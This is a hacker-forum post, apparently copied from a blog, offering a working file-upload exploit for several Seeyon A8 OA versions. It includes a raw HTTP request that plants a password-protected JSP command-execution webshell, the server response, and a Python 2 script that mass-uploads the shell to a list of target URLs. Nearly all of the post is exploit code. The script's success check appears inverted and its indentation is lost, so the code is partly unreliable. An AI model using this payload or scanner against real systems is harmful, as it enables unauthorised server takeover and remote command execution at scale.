• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

致远OA系统多版本Getshell – 附批量检测Poc


JieGe

Recommended Posts

  • Members

漏洞影响产品版本:

  • 致远A8-V5协同管理软件 V6.1sp1
  • 致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3
  • 致远A8+协同管理软件V7.1

漏洞情况:

访问/seeyon/htmlofficeservlet出现DBSTEP V3.0 0 21 0 htmoffice operate err”

POST包:


 
 
POST /seeyon/htmlofficeservlet HTTP/1.1
 
Content-Length: 1121
 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
 
Host: xxxxxxxxx
 
Pragma: no-cache
 
DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV
 
OPTION=S3WYOSWLBSGr
 
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
 
CREATEDATE=wUghPB3szB3Xwg66
 
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
 
originalFileId=wV66
 
originalCreateDate=wUghPB3szB3Xwg66
 
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
 
needReadFile=yRWZdAS6
 
originalCreateDate=wLSGP4oEzLKAz4=iz=66
 
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

 
 
 
 
 
 

响应包:


 
 
DBSTEP V3.0 386 0 666 DBSTEP=OKMLlKlV
 
OPTION=S3WYOSWLBSGr
 
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
 
CREATEDATE=wUghPB3szB3Xwg66
 
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
 
originalFileId=wV66
 
originalCreateDate=wUghPB3szB3Xwg66
 
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
 
needReadFile=yRWZdAS6
 
originalCreateDate=wLSGP4oEzLKAz4=iz=66
 
CLIENTIP=wLCXqUKAP7uhw4g5zi=6
 
 
 
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>

 
 
 
 
 
 
致远OA系统多版本Getshell – 附批量检测Poc-Ti0s's Blog 致远OA系统多版本Getshell – 附批量检测Poc-Ti0s's Blog

批量检测 (Python)


 
 
# Wednesday, 26 June 2019
 
# Author:nianhua
 
# Blog:https://github.com/nian-hua/
 
 
 
import re
 
import requests
 
import base64
 
from multiprocessing import Pool, Manager
 
 
 
def send_payload(url):
 
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
 
payload = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U="
 
payload = base64.b64decode(payload)
 
try:
 
r = requests.post(url + '/seeyon/htmlofficeservlet', data=payload)
 
r = requests.get(
 
url + '/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+wangming')
 
if "wangming" in r.text:
 
return 0
 
else:
 
return url
 
except:
 
return 0
 
 
 
def remove_control_chars(s):
 
control_chars = ''.join(map(unichr, range(0,32) + range(127,160)))
 
control_char_re = re.compile('[%s]' % re.escape(control_chars))
 
s = control_char_re.sub('', s)
 
if 'http' not in s:
 
s = 'http://' + s
 
return s
 
def savePeopleInformation(url, queue):
 
newurl = send_payload(url)
 
if newurl != 0:
 
fw = open('loophole.txt', 'a')
 
fw.write(newurl + '\n')
 
fw.close()
 
queue.put(url)
 
def main():
 
pool = Pool(10)
 
queue = Manager().Queue()
 
fr = open('url.txt', 'r')
 
lines = fr.readlines()
 
for i in lines:
 
url = remove_control_chars(i)
 
pool.apply_async(savePeopleInformation, args=(url, queue,))
 
allnum = len(lines)
 
num = 0
 
while True:
 
print queue.get()
 
num += 1
 
if num >= allnum:
 
fr.close()
 
break
 
main()

 
 
 
 
 
 
赞赏
 
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now